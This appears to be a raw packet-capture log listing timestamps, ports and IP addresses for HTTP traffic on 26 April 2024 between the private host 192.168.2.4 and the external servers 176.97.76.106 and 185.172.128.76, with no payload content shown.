Apr 26, 2024 10:27:05.088536978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088555098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088572025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.088577032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.088618040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089140892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089201927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089226961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089242935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089245081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089260101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089282036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089293003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089309931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089327097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089333057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089365005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089696884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089714050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089734077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089755058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089781046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089798927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089816093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089848042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089865923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089884043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089900970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089901924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089917898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.089925051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089948893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.089981079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090022087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090050936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090078115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090096951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090114117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090130091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090135098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090166092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090171099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090184927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090225935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090248108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090265036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090281963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090298891 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090301037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090317011 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090333939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090343952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090352058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090368986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090368986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090404034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090419054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090508938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090526104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090542078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090559959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090560913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090578079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090584040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090610981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090614080 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090629101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090646029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090663910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090667009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090682030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090698957 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090717077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090740919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090776920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090794086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090814114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090830088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090831041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090879917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.090884924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090903044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090974092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.090991020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091007948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091013908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091027975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091036081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091047049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091063023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091063023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091082096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091104984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091114044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091176033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091192961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091207981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091218948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091232061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091234922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091249943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091265917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091267109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091305971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091311932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091331005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091348886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091365099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091382027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091406107 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091442108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091461897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091500044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091533899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091568947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091588974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091607094 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091609955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091630936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091651917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091667891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091672897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091692924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091731071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091752052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091772079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091789961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091793060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091813087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.091815948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.091856956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.165184021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.165244102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.165285110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.165370941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.165405989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.166285992 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.166327000 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.166384935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.167574883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.167614937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.168168068 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.168205976 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.169524908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.169564009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.170455933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.170494080 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.170532942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.170569897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.170835972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.170880079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.170917988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.170954943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.171051979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.171088934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.171125889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.171163082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.171200991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.171237946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.172468901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.172504902 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.172543049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.172583103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.172878981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.172933102 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.172971010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173008919 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173044920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173083067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173131943 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173171043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173207045 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173244953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173280954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173317909 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173356056 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173392057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173429012 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173485041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173521996 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173558950 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173595905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173634052 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173671007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173707962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173743963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173780918 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173832893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173867941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173906088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173940897 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.173978090 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.174014091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.174050093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.174087048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.174123049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.174958944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175051928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175091028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175127983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175129890 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175165892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175169945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175220966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175225019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175261974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175267935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175299883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175309896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175338984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175344944 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175378084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175386906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175415039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175421953 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175451994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175453901 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175488949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175498009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175525904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175537109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175565004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175569057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175601959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175609112 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175638914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175648928 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175676107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175684929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175713062 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175720930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175750017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175757885 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175787926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175795078 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175825119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175862074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175868988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175899029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175909042 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175936937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175947905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.175972939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.175982952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176011086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176019907 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176047087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176083088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176086903 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176131010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176139116 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176176071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176184893 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176213026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176219940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176250935 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176259995 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176289082 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176292896 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176326036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176340103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176363945 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176373959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176399946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176408052 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176436901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176443100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176474094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176489115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176512003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176522017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176548004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176558971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176585913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176621914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176640034 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176662922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176672935 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176700115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176714897 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176737070 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176774979 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176791906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176805973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176811934 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176829100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176848888 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176857948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176887035 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176897049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176924944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176939011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.176963091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.176970959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177000999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177010059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177037954 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177046061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177077055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177083969 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177114010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177123070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177160025 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177522898 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177561998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177572966 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177603006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177663088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177699089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177705050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177737951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177742958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177773952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177779913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177813053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177819014 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177850962 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177855015 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177891970 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177906036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177944899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.177951097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.177989006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178090096 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178137064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178210974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178248882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178250074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178287983 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178293943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178327084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178332090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178369999 CEST	49733	80	192.168.2.4	185.172.128.76
